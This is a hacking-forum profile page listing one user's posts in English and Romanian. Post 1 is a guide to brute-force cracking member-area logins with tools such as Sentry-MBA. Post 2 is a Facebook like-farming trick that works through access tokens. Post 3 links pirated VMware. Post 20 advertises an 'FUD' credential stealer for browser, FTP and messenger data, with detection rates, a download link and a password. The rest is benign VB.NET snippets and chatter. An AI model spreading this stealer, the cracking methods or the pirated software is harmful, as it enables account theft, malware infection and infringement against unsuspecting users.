Jump to content

io.kent

Active Members
  • Posts

    2325
  • Joined

  • Last visited

  • Days Won

    21

Everything posted by io.kent

  1. There are four general types of member areas that are crackable: 1. Pop-Up/Basic Authorization: The first type is basic authorization. Also known as pop-up website security, basic authorization is an easy website login area that opens a new window with a username and password area to log in to. In theory, if there is no limit to the number of attempts, a brute force attack will always be successful. This method is mainly successful when the password is relatively short, but in some cases it doesnt matter. "C-Force", "Sentry-MBA", and other programs can handle this type of security! Ex. : members.bangbros.com 2. Form Security: The next type is of course Form security. Notably, this is among the most common and is a little harder to crack, depending on the website. Many cracking programs such as Apex or Sentry-MBA focus specifically on cracking this type of member areas. Form type security is embedded on the site where there is no characters that you have to type in, and its just usually 2 boxes for a Username and one for a Password. Ex. : Hotfile.com 3. Strongbox Security: The next type is strongbox. Strongbox has a very easy to read captcha image with a gray hue to it. Captcha is an image with letters where the system verifies if the user trying to login is human or not. These are harder to crack, because you must type in the letters that appear. "FastOCR", and other programs can handle this type of login! 4. OCR Type Security: Lastly is OCR. Embedded into sites, this character recognition software makes it very difficult for accounts to be cracked. By the same token, it has a captcha image like strongbox except this image is difficult for even real people to read! Certain programs for this type of security include Sentry-MBA and FastOCR.
  2. 1: So the first thing you need to do before starting is to enable subscribers on your facebook you can do that here: https://www.facebook.com/about/follow 2: Head over to Status Likes then click where it says :Click here And Allow Permission To xPeria To Get Access Token 3:allow the xperia applicaton then copy the text in your webbrowser search bar. And paste it in the search box at Likelo.com 4:choose the photo or status to being liked! Then PANG you got between 100-300 likes! 5: go to accountsettings on facebook>Applications>DELETE the xperia application you allowed in step 3 otherwhise you will also start liking others pics/status. GATA...
  3. Sisteme operative: Windows XP/Vista/7 Memoria RAM: 1 GB Procesor: 1.0 GHz CPU spatiu in disc: 150 MB Nu cred cred ca este nevoie de mai multa descriere.. download : http://www15.uptobox.com:8080/d/wayxxf4xf2r76xkqbbrykbztmya4qtuz6kvpwybziwlim4v4nynj2dr2/VMware%20Workstation%209.rar Descarcare VMware-20Workstation-209.rar - BitShare.com - Free File Hosting and Cloud Storage ??????? ???? VMware Workstation 9.rar. ??????? ????????? ? ??? ??????????? ? TurboBit.net Marimea : 410 MB Format : *.rar parola :
  4. Daca iiti dau 5000 zilnic esti multumit? sper ca oferta sa fie acceptabila..
  5. Danny, daca iti da cineva 12-mil, pe el, scapate de el..
  6. Bogdane, faci Oferte la ce-i care candva ti-au dat o mana de ajutor?
  7. Renegade e bine facut, te felicit, personal...
  8. This is the Source Code for Rapidshare Downloader Using Premium Account.... By Using this You Need Webbrowser Textbox Button1 for Navigate Button2 for Download First You Need to Add the Webbrowser from the Toolbox After that Click the Form1 and Add this Code :- [This will Load the Rapidshare Server Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Me.Enabled = False WebBrowser1.Navigate("http://www.rapidshare.com") End Sub Click the Button1 and Add this Code :- This is Enter Ur Premium account Details and Login You In.... Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Try MsgBox("Please Wait !!.. 1 Minutes For the First Use", MsgBoxStyle.Information, "Rapidshare Premium Downloader") With WebBrowser1.Document .GetElementById("js-directlogin-username").SetAttribute("Value", "your Username") .GetElementById("js-directlogin-password").SetAttribute("Value", "your password") End With Dim allelements2 As HtmlElementCollection = WebBrowser1.Document.All For Each webpageelement As HtmlElement In allelements2 If webpageelement.GetAttribute("value") = "Login" Then webpageelement.InvokeMember("click") End If Next Catch MsgBox("Please Try Again !!", MsgBoxStyle.Information, "Rapidshare Premium downloader") End Try End Sub After that Add this Code :- If the Document Completed It Enable the Program Private Sub WebBrowser1_DocumentCompleted(ByVal sender As System.Object, ByVal e As System.Windows.Forms.WebBrowserDocumentCompletedEv entArgs) Handles WebBrowser1.DocumentCompleted Me.Enabled = True End Sub At Last Click the Button2 and Add this Code :- This will download Begin Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click WebBrowser1.Navigate(TextBox1.Text) End Sub Enjoy..
  9. On upside in your project put this code means after public class Form1. Sub CheckIfAlreadyRunning() If Not Process.GetProcessesByName(Process.GetCurrentProce ss.ProcessName).Length > 1 Then Exit Sub MsgBox("The application is allready running", MsgBoxStyle.Critical, "System") End End Sub And now just in forum load put this Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load CheckIfAlreadyRunning() End sub
  10. mod de autentificare folosind HttpWebrequest.... Textboxs Textbox1 for UserName Textbox2 For Password (put the PasswordChar to systemDefault) Button for Login Our Imports : Imports System.Net Imports System.Text Imports System.IO In the Public Class Form Add This Code Dim logincookie As CookieContainer Click the Button and Add this Code : Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim postData As String = "http%3A%2F%2Feliteguys.org%2Fforum%2Fmember.php?action=login&username=" + TextBox1.Text & "&password=" + TextBox2.Text & "&submit=Login&action=do_login&url=" Dim tempcookies As New CookieContainer Dim encoding As New UTF8Encoding Dim byteData As Byte() = encoding.GetBytes(postData) Dim postreq As HttpWebRequest = DirectCast(HttpWebRequest.Create("http://eliteguys.org/member.php?&action=login"), HttpWebRequest) postreq.Method = "POST" postreq.KeepAlive = True postreq.CookieContainer = tempcookies postreq.UserAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729" postreq.ContentType = "application/x-www-form-urlencoded" postreq.Referer = "http://eliteguys.org/member.php?&action=login" postreq.ContentLength = byteData.Length Dim postreqstream As Stream = postreq.GetRequestStream() postreqstream.Write(byteData, 0, byteData.Length) postreqstream.Close() Dim postresponse As HttpWebResponse postresponse = DirectCast(postreq.GetResponse, HttpWebResponse) tempcookies.Add(postresponse.Cookies) logincookie = tempcookies Dim postreqreader As New StreamReader(postresponse.GetResponseStream()) Dim thepage As String = postreqreader.ReadToEnd If thepage.Contains("You have entered an invalid username/password combination.") = True Then MsgBox("Incorrect Username/password combination", 0, "Login error!") Else MsgBox("Logged in", 0, "Success!") End If End Sub End Class
  11. Imports System.Net Public Class Form1 Dim CurrentVersion As String = "1.0" Dim wc As New WebClient Dim latestversion As String = wc.DownloadString("http://pathtoupdatescript.com/update.php") Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub <?php $version = yourversion echo $verion; ?>
  12. Aceasta sursa proxy de a utiliza Proxy in downloader pentru a reduce interzicerea IP cum ar fi ca , prin utilizarea acestui, ave?i nevoie WebBrowser Button Public Class Form1 de incarcare Adaugati acest cod: - [Acest lucru va reseta IP curent in proxy] Proxy shit Public Structure Struct_INTERNET_PROXY_INFO Public dwAccessType As Integer Public proxy As IntPtr Public proxyBypass As IntPtr End Structure <Runtime.InteropServices.DllImport("wininet.dll", SetLastError:=True)> _ Private Shared Function InternetSetOption(ByVal hInternet As IntPtr, ByVal dwOption As Integer, ByVal lpBuffer As IntPtr, ByVal lpdwBufferLength As Integer) As Boolean End Function Private Sub Devilmaycry(ByVal strProxy As String) Const INTERNET_OPTION_PROXY As Integer = 38 Const INTERNET_OPEN_TYPE_PROXY As Integer = 3 Dim struct_IPI As Struct_INTERNET_PROXY_INFO struct_IPI.dwAccessType = INTERNET_OPEN_TYPE_PROXY struct_IPI.proxy = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi(strProxy) struct_IPI.proxyBypass = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi("local") Dim intptrStruct As IntPtr = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(System.Runtime.InteropServ ?ices.Marshal.SizeOf(struct_IPI)) System.Runtime.InteropServices.Marshal.StructureToPtr(struct_IPI, intptrStruct, True) Dim iReturn As Boolean = InternetSetOption(IntPtr.Zero, INTERNET_OPTION_PROXY, intptrStruct, System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI)) End Sub Click the Button1 and Add this Code :- [This will navigate the website using proxies] ("IP:PORT") webbrowser1.navigate("http://www.whatismyip.com") Succes...
  13. Da foarte interesant...
  14. http://www.crazyboris.org/ merge!
  15. Deschid acest topic, din cauza ca multii, aici deja isi bat pula in useri vechi,personal nu am nimic nu nimenii, ( Respect pe cei noi, la fel ca pe cei mai vechi), ideea este asa, decat sa (comentam) aiurea, si injuraturi, si multa prostie, mai bine sar face ceva, pentru acest forum.. 1.. Programatori, php,vb html, java, si asa mai departe.. 2.. Sa se faca un proiect bine intemeiat, marca, nu neaparat RsT.... doar la programare daca chiar vor sa stie cine lea facut, programele, sa se adauge creat, de mos,ene... 3.. nu conteaza ce este creat, doar sa fie doar sa se vada ca cineva este si are vointa sa faca ceva.. 4.. sunt foarte multe programe, cu o mica scanteie, pot fi modificate, rescrise, sau mai bine zis, facute in asa fel in care nimenii nu sar gandi. 5.. Dati drumul la minte, si nu la prostie..Prostia dauneaza sanatatii si a prietenilor.. 6.. Daca un user posteaza, un anumit tool, si are 1, post deja saritii cu gura pe el, inainte trebuie verificat, poate acest user are o culura generala, si merita putina atentie, Astept propuneri, si idei, mai multe ca ajutor, si cererii... Nu-s acasa dar eu personal, de maine incep in forta maxima...
  16. inchide cineva, thread-ul asta!
  17. penibil?, inainte sa zica ratati.. Sa se gandeasca inainte, si tu la fel, citeste de 10 ori, sa intelegi 1-data date-n doamne iartama, primadata face ratatii, si dupa aia o da in dragoste? carei sensul aici? explicate inteligentule...
  18. laz ce ai cu aceste persoane? sau tastam de dragul de-a folosi tastatura...Explicate...
  19. io.kent

    Fun stuff

    https://www.facebook.com/media/set/?set=vb.203213829827911&type=2 Accesati video..
  20. Chrome Filezilla PigDin Winkey Nombre del User SO Pais IP Anti-Virtuales Recent Cookies SCAN : Date 2013-06-15 19:41:17 (GMT 1) File name spy-builder-exe File size 827849 bytes MD5 hash 6c0a8b55313d76aee939bfee073c9904 SHA1 hash c4128988355d1cc4296de8a9cebbc13d4e1a7c3e Detection rate: [COLOR="#FF0000"] 3[/COLOR] on 14 (21%) Status: INFECTED 6c0a8b55313d76aee939bfee073c9904 Antivirus Scan Report - Powered by NoVirusThanks.org Date 2013-06-15 19:41:18 (GMT 1) File name stub-exe File size 768007 bytes MD5 hash f5bedea31f422010d0c896510f0b0cd5 SHA1 hash a997d340b211f2af7b448ba3c4e250cfd89f4e38 Detection rate: [COLOR="#FF0000"]1[/COLOR] on 14 (7%) Status: INFECTED f5bedea31f422010d0c896510f0b0cd5 Antivirus Scan Report - Powered by NoVirusThanks.org DOWNLOAD: Zippyshare.com - Spy Stealer M3.rar PASS: M3 sursa: Spy AutoIt Stealer [ FUD ]
  21. You'll need Textbox textbox1 - 4Shared Url textbox2 webbrowser1 button ( Change text to download ) Click Form1 Load, Add This Code :- Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Button1.Enabled = False WebBrowser1.Hide() TextBox2.Hide() TextBox2.Text = "http://www.4server.info/download/" End Sub Click The Download Button, Add This Code :- Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click WebBrowser1.Navigate(TextBox2.Text + TextBox1.Text) MsgBox("Please wait a sec") End Sub Click Textbox1, Add This Code :- Private Sub TextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox1.TextChanged Dim str1 As String = (TextBox1.Text) If str1.Contains("www.4shared.com/file/") Then Button1.Enabled = True Else Button1.Enabled = False End If End Sub
  22. ZeroDoi, crezi ca e nevoie, sa-l injuram? cred ca mai bine ar fii, sa-i explicam cum sta treaba, dai un deface, dar te gandesti inainte ca cineva a muncit mult sa ridice pagina, si tu mare branza dai repede deface, minte slaba!
  23. am vazut ca nici nu e bine postat dar ce sa-i fac? vin alti si-l coboara cu picioarele pe pamant..
  24. Daca nu vroiai sa auzi comentarii de genul asta, nu te ofereai, asa ca daca te-ai oferit, accepta..
  25. ce tare ai fost, la faza asta, gugustiuc:) lol?
×
×
  • Create New...